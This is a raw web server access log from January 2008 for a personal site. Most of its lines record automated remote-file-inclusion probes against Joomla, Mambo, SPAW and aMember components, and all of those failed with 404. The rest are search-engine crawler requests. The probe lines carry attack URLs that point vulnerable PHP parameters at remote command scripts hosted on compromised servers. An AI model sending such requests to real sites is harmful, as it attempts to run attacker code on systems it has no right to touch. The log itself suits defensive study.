216.35.196.53 - - [10/Jan/2008:10:28:25 -0800] "GET /logs/access_071221.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.vasselai.com.br/hp/empresa/pioneiros/.r/stringa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
121.156.105.11 - - [10/Jan/2008:10:29:24 -0800] "GET /logs/access_071229.log/?displayCategory.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.60.109.199 - - [10/Jan/2008:10:32:03 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/ppl/good/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.243 - - [10/Jan/2008:10:33:50 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.243 - - [10/Jan/2008:10:33:51 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.243 - - [10/Jan/2008:10:33:51 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [10/Jan/2008:10:35:39 -0800] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [10/Jan/2008:10:35:39 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [10/Jan/2008:10:35:39 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [10/Jan/2008:10:35:39 -0800] "GET /logs/access_071225.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [10/Jan/2008:10:36:39 -0800] "GET /logs/access_071222.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [10/Jan/2008:10:36:39 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [10/Jan/2008:10:36:39 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [10/Jan/2008:10:36:53 -0800] "GET /logs/access_071225.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.23.159.114 - - [10/Jan/2008:10:38:05 -0800] "GET /logs//mambots/content/multithumb/lightbox/js/content/multithumb?mosConfig_absolute_path=http://www.watercolorusahonorsociety.org/ctrl.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
217.23.159.114 - - [10/Jan/2008:10:38:05 -0800] "GET //mambots/content/multithumb/lightbox/js/content/multithumb?mosConfig_absolute_path=http://www.watercolorusahonorsociety.org/ctrl.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
74.6.24.222 - - [10/Jan/2008:10:40:33 -0800] "GET /mobileoffice/?S=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.60.109.199 - - [10/Jan/2008:10:41:45 -0800] "GET /logs/access_071224.log/tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/ppl/good/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.60.109.199 - - [10/Jan/2008:10:41:45 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/ppl/good/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [10/Jan/2008:10:43:54 -0800] "GET /logs/access_071221.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [10/Jan/2008:10:43:54 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [10/Jan/2008:10:43:54 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [10/Jan/2008:10:43:54 -0800] "GET /logs/access_071225.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.193.229.33 - - [10/Jan/2008:10:44:29 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.totsmartcall.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.193.229.33 - - [10/Jan/2008:10:44:29 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.totsmartcall.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.15.147.104 - - [10/Jan/2008:10:45:21 -0800] "GET /logs/access_071224.log/config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.147.104 - - [10/Jan/2008:10:45:21 -0800] "GET /config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.147.104 - - [10/Jan/2008:10:45:21 -0800] "GET /logs/config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.147.104 - - [10/Jan/2008:10:45:21 -0800] "GET /logs/access_071224.log/config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.147.104 - - [10/Jan/2008:10:45:21 -0800] "GET /config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.147.104 - - [10/Jan/2008:10:45:22 -0800] "GET /logs/config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.59.71.243 - - [10/Jan/2008:10:45:51 -0800] "GET /logs/access_071229.log//tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.243 - - [10/Jan/2008:10:45:51 -0800] "GET //tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.59.71.243 - - [10/Jan/2008:10:45:51 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://dev1l.t35.com/id/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.193.229.33 - - [10/Jan/2008:10:45:53 -0800] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.totsmartcall.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
213.193.229.33 - - [10/Jan/2008:10:45:53 -0800] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.totsmartcall.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
208.186.169.183 - - [10/Jan/2008:10:47:08 -0800] "GET /logs/access_071110.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [10/Jan/2008:10:47:09 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [10/Jan/2008:10:47:09 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [10/Jan/2008:10:47:13 -0800] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:10:48:24 -0800] "GET /logs/access.log/config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:10:48:25 -0800] "GET /config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:10:48:25 -0800] "GET /logs/config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [10/Jan/2008:10:48:32 -0800] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [10/Jan/2008:10:48:32 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [10/Jan/2008:10:48:32 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:10:48:37 -0800] "GET /logs/access.log/config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:10:48:37 -0800] "GET /config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:10:48:37 -0800] "GET /logs/config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.186.169.183 - - [10/Jan/2008:10:48:42 -0800] "GET /logs/access_071225.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:10:48:44 -0800] "GET /logs/access.log/config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:10:48:44 -0800] "GET /config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:10:48:44 -0800] "GET /logs/config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:10:48:47 -0800] "GET /logs/access.log/config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:10:48:48 -0800] "GET /config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:10:48:48 -0800] "GET /logs/config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:10:48:50 -0800] "GET /logs/access.log/config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:10:48:50 -0800] "GET /config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:10:48:51 -0800] "GET /logs/config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
151.1.141.17 - - [10/Jan/2008:10:50:39 -0800] "GET /logs/access_071224.log/config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [10/Jan/2008:10:50:39 -0800] "GET /config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.1.141.17 - - [10/Jan/2008:10:50:40 -0800] "GET /logs/config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.114.21 - - [10/Jan/2008:10:50:53 -0800] "GET /include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.114.21 - - [10/Jan/2008:10:50:57 -0800] "GET /logs/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.114.21 - - [10/Jan/2008:10:51:01 -0800] "GET /logs/access_071225.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.114.21 - - [10/Jan/2008:10:51:13 -0800] "GET /logs/access_071221.log/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:10:52:03 -0800] "GET /logs/access_071224.log/config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:10:52:06 -0800] "GET /logs/access_071224.log/config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:10:52:10 -0800] "GET /logs/access_071224.log/config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.166.231 - - [10/Jan/2008:10:52:10 -0800] "GET /logs/access_071224.log/config.php?path_to_root=http://www.autosud.it/modules/shop/images/djd1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.201 - - [10/Jan/2008:10:52:38 -0800] "GET /logs/access_071007.log HTTP/1.0" 200 56320 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:55:05 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "genieBot (enash@genieknows.com)" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:55:06 -0800] "GET / HTTP/1.0" 200 2946 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:55:17 -0800] "GET /?N=D HTTP/1.0" 200 2946 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:55:26 -0800] "GET /?M=A HTTP/1.0" 200 2946 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:55:36 -0800] "GET /?S=A HTTP/1.0" 200 2946 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:55:46 -0800] "GET /?D=A HTTP/1.0" 200 2946 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:55:56 -0800] "GET /_private/ HTTP/1.0" 403 163 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:56:06 -0800] "GET /backup/ HTTP/1.0" 401 395 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:56:16 -0800] "GET /backup2/ HTTP/1.0" 401 395 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:56:26 -0800] "GET /bikes/ HTTP/1.0" 200 2036 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:56:36 -0800] "GET /drop/ HTTP/1.0" 401 395 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
74.6.8.71 - - [10/Jan/2008:10:56:40 -0800] "GET /mobileoffice/?D=A HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:56:46 -0800] "GET /funny/ HTTP/1.0" 200 792 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:56:56 -0800] "GET /imperant/ HTTP/1.0" 401 395 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:57:06 -0800] "GET /logs/ HTTP/1.0" 200 29522 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:57:16 -0800] "GET /megumi/ HTTP/1.0" 200 921 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:57:26 -0800] "GET /minamijewelry/ HTTP/1.0" 200 2094 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:57:36 -0800] "GET /mobilehackers/ HTTP/1.0" 401 395 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:57:46 -0800] "GET /mobileoffice/ HTTP/1.0" 200 5008 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
212.159.3.233 - - [10/Jan/2008:10:57:52 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.159.3.236 - - [10/Jan/2008:10:57:53 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:57:56 -0800] "GET /plans/ HTTP/1.0" 200 958 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:58:06 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:58:16 -0800] "GET /retreat1/ HTTP/1.0" 200 15065 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:58:26 -0800] "GET /tmp/ HTTP/1.0" 200 1657 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
74.6.22.221 - - [10/Jan/2008:10:58:32 -0800] "GET /tools/ HTTP/1.0" 200 12388 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:58:36 -0800] "GET /tools/ HTTP/1.0" 200 12388 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:58:46 -0800] "GET /warboard/ HTTP/1.0" 401 395 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:58:56 -0800] "GET /?N=A HTTP/1.0" 200 2946 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:59:07 -0800] "GET /?M=D HTTP/1.0" 200 2946 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:59:19 -0800] "GET /?S=D HTTP/1.0" 200 2946 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:59:26 -0800] "GET /?D=D HTTP/1.0" 200 2946 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:59:36 -0800] "GET /bikes/?N=D HTTP/1.0" 200 2036 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:59:46 -0800] "GET /bikes/?M=A HTTP/1.0" 200 2036 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:10:59:56 -0800] "GET /bikes/?S=A HTTP/1.0" 200 2036 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:00:06 -0800] "GET /bikes/?D=A HTTP/1.0" 200 2036 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:00:16 -0800] "GET /bikes/CreSTOC07/ HTTP/1.0" 200 15280 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:00:26 -0800] "GET /bikes/IMG_1188.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:00:37 -0800] "GET /bikes/IMG_1189.jpg HTTP/1.0" 200 131072 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:00:47 -0800] "GET /bikes/IMG_1190.jpg HTTP/1.0" 200 65536 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:00:56 -0800] "GET /bikes/IMG_1191.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:01:06 -0800] "GET /bikes/IMG_1192.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:01:16 -0800] "GET /bikes/VFR750A.jpg HTTP/1.0" 200 212696 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:01:26 -0800] "GET /bikes/dteel/ HTTP/1.0" 200 8249 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:01:36 -0800] "GET /bikes/vfr750b.jpg HTTP/1.0" 200 194464 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:01:46 -0800] "GET /bikes/vfr750c.jpg HTTP/1.0" 200 214232 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:01:56 -0800] "GET /bikes/vfr750d.jpg HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:02:06 -0800] "GET /funny/?N=D HTTP/1.0" 200 792 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:02:16 -0800] "GET /funny/?M=A HTTP/1.0" 200 792 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:02:26 -0800] "GET /funny/?S=A HTTP/1.0" 200 792 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
74.6.8.71 - - [10/Jan/2008:11:02:30 -0800] "GET /bikes/?S=A HTTP/1.0" 200 2036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:02:36 -0800] "GET /funny/?D=A HTTP/1.0" 200 792 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:02:46 -0800] "GET /funny/Mencanmultitask.asx HTTP/1.0" 200 196608 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:02:56 -0800] "GET /logs/?N=D HTTP/1.0" 200 29522 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:03:06 -0800] "GET /logs/?M=A HTTP/1.0" 200 29522 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:03:16 -0800] "GET /megumi/?N=D HTTP/1.0" 200 921 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
82.112.124.79 - - [10/Jan/2008:11:03:36 -0800] "GET /logs/access_071229.log/admin/spaw/spaw_control.class.php?spaw_root=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.112.124.79 - - [10/Jan/2008:11:03:37 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.112.124.79 - - [10/Jan/2008:11:03:37 -0800] "GET /logs/admin/spaw/spaw_control.class.php?spaw_root=http://www.citomed.pt/mambots/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:07:42 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "genieBot (enash@genieknows.com)" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:08:13 -0800] "GET /?M=A HTTP/1.0" 200 2946 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:08:25 -0800] "GET /?S=A HTTP/1.0" 200 2946 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:08:33 -0800] "GET /?D=A HTTP/1.0" 200 2946 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:08:43 -0800] "GET /_private/ HTTP/1.0" 403 163 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:08:53 -0800] "GET /backup/ HTTP/1.0" 401 395 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
64.5.245.21 - - [10/Jan/2008:11:09:04 -0800] "GET /backup2/ HTTP/1.0" 401 395 "-" "genieBot enash@genieknows.com" "www.dmulk.com"
